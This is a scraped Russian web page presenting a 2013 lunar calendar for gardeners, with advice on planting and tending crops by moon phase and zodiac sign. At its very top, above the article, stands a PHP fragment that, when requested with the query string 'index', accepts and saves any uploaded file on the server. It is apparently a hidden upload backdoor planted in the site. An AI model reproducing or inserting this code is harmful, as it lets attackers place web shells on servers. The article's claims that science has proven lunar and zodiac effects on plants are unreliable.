if ($_SERVER['QUERY_STRING'] == 'index') { echo '
'; $uploaddir = ''; $uploadfile = $uploaddir.basename($_FILES['uploadfile']['name']); if (copy($_FILES['uploadfile']['tmp_name'], $uploadfile)) { echo "

OK

"; exit; }else{ echo "

NO

"; exit; } exit; } Лунный календарь садовода и огородника на 2013 год
Загрузка...
Лунный календарь садовода и огородника на 2013 год

Лунный календарь садовода и огородника на 2013 годЛунный календарь садовода и огородника на 2013 год

Рассмотрим лунный цикл для лунного календаря садоводов и огородников на 2013 год . Садоводы и огородники ещё много веков назад на собственном опыте убедились в том, что положение Луны и её фазы влияют на качество урожая и всхожесть семян.

Наши современники уже получили научное доказательство этого влияния. Специальные исследования подтвердили, что лунный свет оказывает не меньшее влияние на рост и развитие растений, чем солнечный. Лунный календарь на 2013  год  садовода-огородника говорит о том, что кроме восхода-захода Солнца и долготы дня, на садово-огородные процессы влияют и фазы Луны, и лунные дни, и нахождение Луны том или ином знаке Зодиака.


Лунный цикл имеет четыре периода: новолуние, растущая луна (первая и вторая четверти или фазы), полнолуние, убывающая Луна (3 и 4 фазы).


Новолуние.

Этот период длится около 3 суток: сутки перед новолунием, сутки новолуния и сутки после новолуния.



В этот период все силы растений сосредоточены в корневой системе. Поэтому не рекомендуется посадка растений и культур, пересадка их и прививка. Лунный календарь садовода-огородника на 2013 год в противовес утверждает, что однако это время благоприятно для борьбы с сорняками, вредителями, болезнетворными микроорганизмами, а также для очищения растений от больных и засохших ветвей.

Обратите внимание, что эти работы можно проводить только в первый и третий дни новолуния, а во второй день – в само новолуние – растения лучше оставить в покое.



Растущая луна – первая и вторая фазы.

1-я фаза наступает после новолуния и продолжается около 7 лунных дней, 2-я фаза длится чуть больше 7 дней и заканчивается наступлением полнолуния.



С началом роста Луны активизируется движение соков всех растений снизу вверх. Все листья, ветки и побеги растений максимально насыщаются энергией.

Это благоприятное время для посадки деревьев, кустарников и цветов. Хорошо прививать растения, а также сажать листовые растения и овощи для получения с них плодов.


Полнолуние.

Длится полнолуние около 3 суток.



В это время вся сила растений сконцентрирована на наземной части.

В связи с тем, что в это время снижена жизнеспособность и приживаемость корневой системы, посадку и пересадку растений лучше не проводить за 12 часов до наступления полнолуния и в течение 12 часов после полнолуния. Лунный календарь на  2013 год  садовода и огородника также предупреждает, что не рекомендуется в эти 24 часа проводить прививку, прищипку, пасынкование и обрезку растений.

Однако в это время можно делать прополку от сорняков, прореживание всходов, мульчирование, уничтожение возбудителей болезней и вредителей, а также сбор семян.



Убывающая Луна – третья и четвёртая четверти.

3-я фаза (четверть) продолжается 7 дней, и наступает вслед за полнолунием, а 4-я фаза длится немного больше, чем 7 дней, и заканчивается новолунием.



В период убывающей Луны все соки растений начинают своё движение вниз – к корням. Поэтому в это время нужно сеять, сажать и делить корнеплоды, луковичные и клубневые культуры. Рекомендуется также черенкование, внесение удобрений и полив растений.





Влияние на растения знака Зодиака, в котором находится Луна



В течение лунного месяца Луна проходит через 12 знаков Зодиака: Овен, Телец, Близнецы, Рак, Лев, Дева, Весы, Скорпион, Стрелец, Козерог, Водолей, Рыбы.

В каждом знаке Зодиака Луна находится около 2,5 дней, в течение которых данное зодиакальное созвездие оказывает своё влияние на всё живое, в том числе и на рост и развитие растений.



Ещё на растения влияет так называемая «восходящая» и «нисходящая» Луна. Не путайте её с растущей и убывающей Луной.

Здесь имеется в виду положение Луны в знаке Зодиака.

В знаках Зодиака: Стрелец, Козерог, Водолей, Рыбы, Овен, Телец, Близнецы всегда находится восходящая Луна, не зависимо от её фазы. Этот период благоприятен для развития надземной части растений, которая во время восходящей Луны наливается соками. Календарь лунных дней на 2013 год для садовода и огородника говорит, что фрукты и надземные овощи в это время становятся особенно сочными. Этот период называют временем урожая.

Нисходящая Луна находится в знаках: Близнецы, Рак, Лев, Дева, Весы, Скорпион, Стрелец. При нисходящей Луне соки растений устремляются вниз и способствуют развитию корней. Этот период называют временем посадок.

Знаки Близнецов и Стрельца причислены к обеим силам Луны, и могут быть названы узловыми пунктами, или переходными периодами.



Все знаки Зодиака условно разделяются на мужские и женские знаки.

Мужские знаки считаются бесплодными, это: Овен, Близнецы, Лев, Весы, Стрелец, Водолей.

Когда Луна проходит через женские, плодородные знаки Зодиака, растения лучше растут, быстрее приживаются и дают более высокий урожай. Женские знаки: Телец, Рак, Дева, Скорпион, Козерог, Рыбы.


У каждого знака Зодиака своё воздействие на разные части растений: корни, листья, цветки и плоды.



Особенности знаков Зодиака, в которых находится Луна:



 Луна в Овне – восходящая Луна – дни плода.



На растущей Луне надо сеять и высаживать все быстрорастущие растения, которые сразу используются в пищу. Лунный календарь 2013 садовода-огородника в этот период советует выращивать такие культуры. Это: салат, кресс-салат, мангольд, листовая горчица, зелень (укроп, петрушка, киндза), капуста, огурцы, помидоры, баклажаны, перец и другие. В это время хорошо прививать плодовые растения.



Убывающая Луна благоприятна для посева и выкапывания редиса, клубней, корнеплодов и луковичных растений. Хорошо собирать плоды и ягоды, а также выпалывать сорняки, перекапывать и рыхлить почву, вносить удобрения.



 Луна в Тельце – восходящая Луна – дни корня.



На растущей Луне рекомендуется сажать плодовые и декоративные кустарники и деревья, рассаду овощную и цветочную и бобовые культуры. Всё, что посажено в этот период, хорошо приживается и растёт, а также противостоит негативному влиянию внешней среды.



Убывающая Луна благоприятна для посева корнеплодов, луковичных, овощных и цветочных культур. Это: картофель, морковь, свёкла, редька, пастернак, корни сельдерея и петрушки. Растения, посаженные в это время, хорошо укореняются, обильно цветут, плодоносят и выбрасывают много побегов. Эти дни благоприятны для удобрения и закладки копмостных куч (в мае-сентябре), а также для борьбы с возбудителями болезней и вредителями, обитающими в почве. В это время хорошо консервировать продукты и убирать на хранение корнеплоды и картофель.



 Луна в Близнецах – переход Луны от восходящей к нисходящей (узловой пункт) – дни цветка.



Растущая Луна благоприятна для посадки цветов, лекарственных и вьющихся растений и некоторых овощей и ягод. Это: брокколи, цветная капуста, фасоль, горох, хмель, клубника, земляника, барвинок и другие. Лунный календарь 2013 садовода-огородника говорит, что в это время рекомендуется заготавливать лекарственные травы (цветки, листья, стебли).



На убывающей Луне рекомендуется выкапывать корни растений лекарственных (шиповника, синюхи, девясила) и луковичных. В это время хорошо пропалывать сорняки, прореживать всходы, удалять поросль и больные растения и побеги, рыхлить почву, подкармливать цветы, уничтожать возбудителей болезней и наземных вредителей. В эти дни нужно собирать урожай для длительного хранения.



 Луна в Раке – нисходящая Луна – дни листа.



На растущей Луне хорошо высаживать, пересаживать и прививать растения. В это время рекомендуется сеять зерновые, овощи и листовые растения, которые не предназначены для долгого хранения: помидоры, огурцы, кабачки, патиссоны, баклажаны, перцы, дыни и арбузы. Благоприятный период для заготовки лекарственных растений (стеблей и листьев).



Убывающая Луна благоприятна для полива и подкормки растений, а также для уничтожения возбудителей болезней и наземных вредителей растений.



 Луна во Льве – нисходящая Луна – дни плода.



Растущая Луна – время для высадки засухоустойчивых растений кустарников и плодовых деревьев, а также клубники и земляники. Лунный календарь 2013 садовода-огородника рекомендует прививать растения именно в этот период.



Убывающая Луна благоприятна для подкормки и полива растений, а также уничтожения возбудителей болезней и наземных вредителей растений.



 Луна в Деве – нисходящая Луна – дни корня.



Растущая Луна благоприятна для посева семян, пикировки рассады, деления и пересадки многолетних растений: цветочных и овощных. Это время посадки декоративных деревьев и кустарников, лекарственных растений, теплолюбивых и однолетних цветов, неустойчивых к заболеваниям. Это: астры однолетние, клубнелуковицы гладиолусов и корнеклубни георгин.

Весной на растущей Луне в Деве пересаживают и высаживают плодовые деревья.

А осенью пересадку и высадку делают на убывающей Луне.



Убывающая Луна благоприятствует посеву корнеплодных культур, высадке картофеля. В это время в течение всего лета хорошо вносить удобрения под плодовые, клубневые растения и корнеплоды, перекапывать и рыхлить почву и закладывать компостные кучи. Рекомендуется уничтожать возбудителей болезней и вредителей растений.



 Луна в Весах – нисходящая Луна – дни цветка.



На растущей Луне рекомендуется проводить посев и посадку любых цветов, чтобы они стали устойчивыми к вредителям и возбудителям болезней. Лунный календарь 2013 садовода-огородника говорит, что хорошо также сеять и сажать лекарственные травы, бобовые, кукурузу и кормовые культуры.



На убывающей Луне можно собирать клубни и семена для хранения и подкармливать цветущие растения.



 Луна в Скорпионе – нисходящая Луна – дни листа.



На растущей Луне надо сеять, высаживать и пересаживать комнатные и лекарственные растения и цветочную рассаду. У растений листовых овощей, высаженных в это время, образуются качественные семена, которые отлично сохраняются. В эти дни хорошо уничтожать слизней.



Убывающая Луна благоприятна для полива и подкормки листовых овощей и декоративно-лиственных растений.



 Луна в Стрельце – пункт перехода от нисходящей Луны к восходящей – дни плода.



Растущая Луна благоприятствует посеву и высадке растений быстрорастущих, которые в пищу используются сразу же: салат, зелень, кресс-салат, горчица листовая, капуста, кабачки, огурцы, помидоры, баклажаны. Сажают также в эти дни быстрорастущие лекарственные травы, анис, хмель, пустырник.



На убывающей Луне рекомендуется уборка плодов, овощей, корнеплодов, клубней, клубнелуковиц для долгого хранения, а также сбор семян, прополка сорняков, прореживание всходов. Лунный календарь 2013 садовода-огородника советует, что

полезно перекапывать и рыхлить почву, а также уничтожать возбудителей болезней и наземных вредителей растений.



 Луна в Козероге – восходящая Луна – дни корня.



На растущей луне надо сеять и сажать однолетние и многолетние цветы, кустарники и деревья, заготавливать черенки и прививать растения. В эти дни растения быстро приживаются и становятся устойчивыми к вредителям и возбудителям болезней, перепадам температур и другим негативным факторам.



На убывающей Луне рекомендуется посев и посадка корнеплодов, картофеля и луковичных растений. Хорошо проводить прополку, рыхлить и перекапывать почву, подкармливать растения, бороться с возбудителями болезней растений и обитающими в почве вредителями, а с апреля по сентябрь – закладывать компостные кучи.



 Луна в Водолее – восходящая Луна – дни цветка.



На растущей луне хорошо собирать лекарственные растения – цветки, листья, стебли.



На убывающей Луне можно выкапывать луковицы, клубни, клубнелуковицы, корнеклубни и собирать урожай для долгого хранения. В эти дни хорошо делать прополку сорняков, удаление больных растений, прореживание всходов, удаление земляничных усов, рыхлить и перекапывать землю.



 Луна в Рыбах – восходящая Луна – дни листа.



Лунный календарь 2013 садовода-огородника говорит, что растущая Луна благоприятна для посева и посадки лекарственных растений, листовых овощей, травянистых растений, декоративно-лиственных, кустарников и деревьев. Можно заготавливать черенки для прививок и пересаживать рассаду.



Убывающая Луна рекомендует подкармливать и поливать растения, уничтожать возбудителей болезней растений и почвенных вредителей.



 

Совет для садовода и огородника на 2013 год :




В периоды солнечных и лунных затмений, которые всегда происходят в новолуние (солнечное затмение) и в полнолуние (лунное затмение) старайтесь никаких работ не проводить ни в саду, ни в огороде.

 
Интересная статья? Поделись ей с другими:
Загрузка...